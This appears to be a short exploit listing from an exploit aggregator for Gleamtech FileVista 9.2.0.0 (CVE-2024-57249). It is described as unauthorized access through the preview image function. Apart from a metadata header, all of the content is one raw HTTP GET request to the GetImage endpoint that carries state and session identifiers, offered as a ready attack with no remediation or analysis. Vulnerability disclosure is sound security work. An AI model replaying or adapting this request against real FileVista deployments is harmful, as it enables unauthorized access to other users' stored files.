## https://sploitus.com/exploit?id=PACKETSTORM:189019
    # Exploit Title: Gleamtech FileVista 9.2.0.0 - Unauthorized Access Preview Image Function
    # Date: Feb 6, 2025
    # Exploit Author: Suthiwat Thepsorn, Theerachai Chanwiroon, Pongtorn Angsuchotmetee
    # Vendor Homepage: https://www.gleamtech.com/
    # Software Link: https://demos.gleamtech.com/filevista/
    # Version: 9.2.0.0
    # Tested on: macOS
    # CVE : CVE-2024-57249
    
    GET /filevista/filemanager.ashx/GetImage?stateId=f42jmy&path=%5b1.+Root+Folder%5d%3a%5c&fileName=Spotlight+1-Narrow.jpg&vary=638667480595383765&sid-gt=eizpoo0jqwbrvx2vcscb3rbd HTTP/2
    Host: demos.gleamtech.com
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
    Accept: image/avif,image/webp,image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Referer: https://demos.gleamtech.com/filevista/filemanager.ashx/Preview?path=%5B1.%20Root%20Folder%5D%3A%5C&fileName=Spotlight%201-Narrow.jpg&previewerType=ImageViewer&stateId=f42jmy
    Sec-Fetch-Dest: image
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Site: same-origin
    Priority: u=5, i
    Te: trailers